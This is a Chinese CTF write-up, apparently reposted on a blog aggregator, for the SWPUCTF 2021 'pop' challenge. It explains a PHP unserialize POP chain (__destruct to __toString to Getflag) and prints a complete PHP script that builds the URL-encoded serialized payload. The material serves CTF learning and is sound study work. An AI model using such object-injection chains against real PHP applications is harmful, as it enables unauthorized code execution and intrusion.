![[SWPUCTF 2021 新生赛]pop](https://imgs.yssmx.com/Uploads/2023/05/461275-1.png)
很明显了 反序列化 pop
构造pop链,主要还是 死盯 反序列化的魔法函数
从__destruct()入手,这里echo
可以调用到__toString
__toString 调用 function Getflag()
w44m类中两个变量并不是共有属性(关于属性文末有链接)
private:是PHP中类的私有成员
protected:是PHP中类的保护成员
所以我们就直接在类中进行赋值
如何调用w44m类中Getflag方法?
在w33m类中tostring方法,可以调用某一个类中的某一个方法。
因此可以给w33m类中的两个变量w00m=w44m类名,w22m=Getflag方法
如何调用w33m类呢?
destruct在对象被销毁时调用,所以给w22m类中的变量w00m一个类w33m就可以调用
pop链(在学校机房写的没有环境,找的php在线编译)
![[SWPUCTF 2021 新生赛]pop](https://imgs.yssmx.com/Uploads/2023/05/461275-2.png)
有私有属性的一定要url编码一下,会有不可见字符![[SWPUCTF 2021 新生赛]pop](https://imgs.yssmx.com/Uploads/2023/05/461275-3.png)
![[SWPUCTF 2021 新生赛]pop](https://imgs.yssmx.com/Uploads/2023/05/461275-4.png)
文章来源:https://www.toymoban.com/news/detail-461275.html
完整pop链
<?php
class w44m{
private $admin = 'w44m';
protected $passwd = '08067';
}
class w22m{
public $w00m;
public function __destruct(){
echo $this->w00m;
}
}
class w33m{
public $w00m;
public $w22m;
public function __toString(){
$this->w00m->{$this->w22m}();
return 0;
}
}
$p = new w22m();
$p->w00m = new w33m();
$p->w00m->w00m=new w44m();
$p->w00m->w22m='Getflag';
echo urlencode(serialize($p));
?>
不了解属性的可以看看PHP类中public、protected、private的区别 PHP类中public、protected、private实例代码文章来源地址https://www.toymoban.com/news/detail-461275.html
到了这里,关于[SWPUCTF 2021 新生赛]pop的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
![[SWPUCTF 2021 新生赛]babyrce(详解)](https://imgs.yssmx.com/Uploads/2024/02/736276-1.png)
![[SWPUCTF 2021 新生赛]ez_unserialize](https://imgs.yssmx.com/Uploads/2024/02/446144-1.png)
![[SWPUCTF 2021 新生赛]easy_md5](https://imgs.yssmx.com/Uploads/2024/02/743978-1.png)
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://imgs.yssmx.com/Uploads/2024/02/443761-1.png)
![2023年8月30日-[SWPUCTF 2021 新生赛]jicao](https://imgs.yssmx.com/Uploads/2024/02/694187-1.png)
![字符型注入([SWPUCTF 2021 新生赛]easy_sql)](https://imgs.yssmx.com/Uploads/2024/02/698756-1.jpg)
![CTF 全讲解:[SWPUCTF 2021 新生赛]Do_you_know_http](https://imgs.yssmx.com/Uploads/2024/02/713864-1.png)
